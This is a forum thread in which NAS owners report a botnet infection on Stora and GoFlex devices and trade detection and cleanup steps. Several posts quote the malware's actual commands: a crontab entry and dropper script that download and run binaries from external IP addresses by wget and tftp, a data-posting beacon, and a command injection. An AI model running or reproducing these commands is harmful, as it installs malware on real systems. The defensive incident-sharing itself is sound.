× Introducing the Orbi 970 Series Mesh System with WiFi 7 technology. For more information visit the NETGEAR Press Room.
Orbi WiFi 7 RBE973
Reply

Re: we are getting hacked ( netgear store )

Ennev
Tutor

we are getting hacked ( netgear store )

I've been noticing, and now i see others uses have the same issues. Of stora webinterface starting being irresponsive after some minutes being powered up. 

 

i know how to log into ssh session on the my stora ( won't describe it here ) 

 

but i've been noticing a task running allways changing some of it's name and using a lot of cpu :

if i use the ps command : 

ps aux | sort -nrk 3,3 | head -n 10

root     10193 44.1  1.1  37208  1436 ?        Ssl  15:45   8:46 ./.sox50

 

its allways called sox** and in the example is running at 44.1 

 

affter a reboot it allways come back around after some time

 

so i went to check the crontab and i see this :

 

*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh

 

in mean that every 15 min the stora download and execute a file on that server 188.92.74.189 legit server rarely just ip address. did an whois and this ip is registred in Latvia, doubt that netgear have facilities there. 

so it basically download a shell script and excute it

 

this script in itself download a binary file called nttpd-z and execute it ! 

 

allso install a sox.sh and execute it too

 

so i get that's my big cpu eater.

 

How did it manage to install itself on the nas ? no idea !!

 

seem that they know of a back door somehow because the passwords on my machine are not easy to guess.

 

This is really concerning 

Message 1 of 18
Ennev
Tutor

Re: we are getting hacked ( netgear store )

From what i'm reserching, it's indeed bad. This is code installed by botnet called LuaBot or something based on it. 

 

removing it is one thing, but i preventing it to come back ? netgear must have some kind of backdoor to our NAS that has been hacked because it could be something obvious that give root privilege. don't think it's a ssh with user root and password "netgear" but could be simple as that.

 

for the stats on my router appart from eating a lot of cpu on the nat itself it not transfering a lot of data. Might be dormant for something else like a ddos attack etc. 

Message 2 of 18
KipL
Initiate

Re: we are getting hacked ( netgear store )

I had the same issue on my MS2110 Stora.  My Stora HDDs had been churning for several weeks ... I thought it was doing some type of defragmentation of the drives or something.  However, when I killed the nttpd process, based upon finding your post here, the HDDs went quiet.  Not sure what the nttpd process is doing but I don't think it's anything "good".  I initially got to your post by doing a netstat command which showed entries for the ip address 188.92.74.189 ... which is where all the "badness" seems to have come from.  Turns out that there are shell scripts that pull down the following files using the wget command:

  •  wznsR.sh
  • wzns.sh
  • soxsh.php
  • .soxP
  • .soxn0  (where n is some number)
  • .nttpd

These all seem to land in the /tmp sub-directory and get deleted as the payloads are delivered and after the .soxn0 and nttpd executables are started.

 

One thing extra that I will pass along.... when I first started looking into the HDDs churning, I thought the Stora was hacked into from the outside and my files were being copied to who knows where.  However, when I unplugged the network cable between it and my router, the churning continued.  So, figured none of my file data was moving across the wire up to the internet.  Next thing I did was look at the log on my Netgear R8500 router (under Advanced > Administration).  There I found many, many attempts to ssh into the Stora from IP addresses from across the internet (nothing on my local network).  I had found another post while researching this that indicated the UPnP configuration that "makes access to the Stora faster" (whatever) is a big security hole.  So, looking on my router under Advanced > Advanced Setup > UPnP, sure enough... there was a UPnP Portmap configuration entry for the IP address of my Stora.  I disabled UPnP on my router, then after rebooting the router, have not since had the ssh attacks from the internet on my Stora.  (Hoping this is the root cause of how this all started.)

 

I think, but cannot confirm, that a ssh session was probably established to my Stora from the internet through this UPnP back door and someone gained access ... perhaps randomly guessing root's password systematically or using the similar process for gaining root access as you mentioned.  I don't know for sure.  But, I'm hoping this was how this Linux/LuaBot sox and nttpd executables got on to my Stora ... as I have now closed off this "backdoor".

 

I did remove all remnants of this from my /tmp directory and from the crontab file, rebooted the Stora, and all seems well as of now.  

 

Cheers!!

Message 3 of 18
gobojo
Initiate

Re: we are getting hacked ( netgear store )

Same problem. HDD chattering all the time. No access to webinterface after some minutters. I dont know how to log in to SSH but I found a solution. Made a rule in my router saying that there should be no internet access to the Storas ip address. Then I made a restart. That stopped the problems. Only thing is that I dont have the remote access. Netgear should provide a solution.
Message 4 of 18
brechbuehler
Aspirant

Re: we are getting hacked ( netgear store )

I found the same on a Seagate GoFlex Home, also a stora.  It's running Axentraserver, specifically

Linux version 2.6.22.18 (philippet@es5x86.axentra.com) (gcc version 4.3.2 (sdk3.2rc1-ct-ng-1.4.1) ) #14 Wed Oct 27 15:41:03 EDT 2010

In /etc/crontab, the last line was the same

*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh

The web server in Latvia, http://188.92.74.189/ isn't currently up, so wget would just hang around for about an hour and presumably time out.  (Thus 'ps' showed about 4 instances of wget at any time, started 15 minutes apart.)

I had noticed no activity on the stora, just ran 'ps' by chance and found this.

Message 5 of 18
easen
Aspirant

Re: we are getting hacked ( netgear store )

I just want to say thank you, as that this thread has really helped me out as my Stora NAS has also been infected. It was only 2 months ago that I updated to the latest version from the stock OS - I recall the latest version is still a few years out of date. I only noticed the additional HDD noises yesterday and thought I would investigate... turns out it was "nttpd" that was causing the IO. 

 

My 1st attempt in removing it caused my RAID to fail (was unable to shutdown the nas cleanly)- it's currently resync'd itself, so hopefully I have lost any data! I've now bought a Snology NAS to replace it - should have done that a long time ago!

 

Anyway disabling the cron entry and disabling the network has seemed to have done the trick.

 

PS if your RAID fails and you want to speed up the recoverly process here's a helpful guide - https://www.cyberciti.biz/tips/linux-raid-increase-resync-rebuild-speed.html

Message 6 of 18
pjg_pigeon
Guide

Re: we are getting hacked ( netgear store )

Thanks, I was suffering from the exact same problem.
Message 7 of 18
d-lux
Aspirant

Re: we are getting hacked ( netgear store )

Thanks for this post, this recently plauged my Stora...

 

Web interface would not load after a few mins and the HDD leds would blink every 5 secs or so.

 

If you all haven't seen this yet, this is a great resource -- 

 

https://sigri44.github.io/OpenStora/

 

One question though I do have, is what is this command doing over and over?

 

(root) CMD (find /var/lib/php/session -type f -name 'sess_*' -cmin +169 -print0 | xargs -r -0 rm)

 

The only way I saw this (and the wznsR.sh commands) were by enabling logging to a local folder (shown how in the open stora wiki)

 

I knew something was up when the LEDs would blink non-stop, finally after commenting out the crontab job and disabling a few other features (access-patrol, upnp and remote updates) the Stora seems to be back to normal.

 

Just curious what the session command is actually doing every 10 mins.

 

Any input helps and thanks much for this post.

Message 8 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

Any idea what was this hack all about?

Was this hack trying to extract data from the Stora and if so is this succesfull?

If I start the Stora without the network cable the green lights do not flicker and stay on all the time.

When I plug in the network cable and without restarting the stora the green light start flickering.

 

Any feedback will be much appreciated.

Message 9 of 18
d-lux
Aspirant

Re: we are getting hacked ( netgear store )

Hi @Jest05 

 

I would  assume they want your data (ie documents with possible PW info in them) and access to your network and connected devices...

 

Putty into your Stora and review the crontab file and post what is  in there.

 

Hope this helps

Message 10 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

Hi D-lux,

 

do not know the meaning of:

Putty into your Stora and review the crontab file and post what is  in there.

 

I am sorry I am not an advanced user and would appreciate if you can expand on this issue.

where do i find the crontab file?

 

Thank you.

 

 

Message 11 of 18
d-lux
Aspirant

Re: we are getting hacked ( netgear store )

Hi @Jest05 

 

Please review this page for help on that (accessing your stora via putty terminal)

 

https://sigri44.github.io/OpenStora/wiki/index_Easy_Root_Access.html

 

Then you need to access the crontab file using the vi command or chmod

 

(Similar to this)

 

https://sigri44.github.io/OpenStora/wiki/index_Disabling_updates_and_external_access.html

 

I believe the crontab file is in /etc, but I can look againi when I get home...

 

You have to be comfortable navigating your nas via console to fix this virus, I am unsureof another way to see it or fix it (if you have it) without the terminal use.

 

Hope this helps

Message 12 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

Hi d-lux,

 

I really appreciate the information you have provided. I am not a Linux user and this will be a bit difficult for me to carry out, although I may try these options later.

 

In view that Netgear will discontinue support for Stora after 1st April 2020, I have decided to purchase an alternative NAS and for the time being I have disconnected my Stora from the network. 

 

I only used to switch on STORA during backup and usually I had STORA runing for 24 hours every week rather than continously on.

 

In view that the green lights were flashing and also after few minutes it did become impossible to log into STORA, do you know what these guys in Latvia were trying to do with their virus? Was it to get the STORA password in order to access the data?

I suppose setting the STORA not to have external access this setup did not stop these guys.

 

Any feedback you (or others in this forum) can provide me with regarding the causes of this virus will be much appreciated.

 

Regards,

 

 

 

Message 13 of 18
Jest05
Tutor

Re: we are getting hacked ( netgear store )

PS...Does anyone know how may STORAS have been affected by this virus/Hack?

Message 14 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

I am haked too. 😞 

and i clean process and crontab every week. but i dont know how backdoor work.

1/i disable access patrol and other

-bash-3.2# chkconfig --list |grep :on
avahi-daemon 0:off 1:off 2:off 3:on 4:on 5:on 6:off
crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
cups 0:off 1:off 2:on 3:on 4:on 5:on 6:off
httpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
lld2 0:off 1:off 2:on 3:on 4:on 5:on 6:off
locator 0:off 1:off 2:on 3:on 4:on 5:on 6:off
messagebus 0:off 1:off 2:on 3:on 4:on 5:on 6:off
minidlna.init 0:off 1:off 2:on 3:on 4:on 5:on 6:off
mynetworkd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ntpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-appserverd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-bootfinish 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-bootinit 0:off 1:off 2:on 3:on 4:on 5:on 6:off
oe-spd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
pre-registration 0:off 1:on 2:off 3:off 4:off 5:off 6:off
reset 0:off 1:on 2:on 3:on 4:on 5:on 6:off
rslsync 0:off 1:off 2:on 3:on 4:on 5:on 6:off
seagate-lifecycle.init 0:off 1:off 2:on 3:on 4:on 5:on 6:off
smb 0:off 1:off 2:on 3:on 4:on 5:on 6:off
spindownd.init 0:off 1:off 2:on 3:on 4:on 5:on 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
syslog 0:off 1:off 2:on 3:on 4:on 5:on 6:off
transmission-daemon 0:on 1:on 2:off 3:off 4:off 5:off 6:on
vsftpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
xMySyncMount.php 0:off 1:off 2:on 3:on 4:on 5:on 6:off 

and disable upnp at router? but it dont work.

Message 15 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

and now this botnet report to server by this process

wget --post-data=df=&vr=vvvlet1 http://213.217.0.184/nap/fwnti-wlt.php

Message 16 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

i found new some activities of this botnet and after i found some interesting script

/var/www/admin/sshtunnel.pl and delete all strings inside. may be work - 5 day fine.

 

last attack executes 

sh -c /usr/lib/spd/scripts/usb/usbremoveall /dev/b`wget -O /tmp/xxx http://103.20.235.213/Ax.html;chmod 777 /tmp/xxx;/tmp/xxx` manual

cat /tmp/xxx
#!/bin/sh
I=103.20.235.213;PW=80;PT=69;DT=600;
I1=103.20.235.211;P1=9560;
rm -f $0
a=dal;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dml;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dmb;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dx3;tftp -g -l /tmp/$a -r $a $I $PT;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dal;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dml;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dmb;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi
a=dx3;wget http://$I:$PW/$a -O /tmp/$a;if [ -f /tmp/$a ];then chmod 777 /tmp/$a;/tmp/$a $DT $I1 $P1 $I2 $P2 $I3 $P3 $I4 $P4 $I5 $P5;if [ ! -f /tmp/$a ];then exit 0;fi;rm -f /tmp/$a;fi

 

becouse for our root no way to protect file? i delete /tmp/xxx and create folder xxx? and after this wget cant download  file. 

 

 

netgear stora seagate goflex

Message 17 of 18
cbiker
Aspirant

Re: we are getting hacked ( netgear store )

now i dont know how botnet start but activity low httpd work. 

4 process detected

sh

sh

/bin/
./ts -g -i 10.0.0.1 -n 255.0.0.0 -R 1080:127.0.0.1:10800 -R 53:8.8.8.8:53

i add it to my killing script.

 

Message 18 of 18
Discussion stats
  • 17 replies
  • 6865 views
  • 7 kudos
  • 9 in conversation
Announcements

Orbi WiFi 7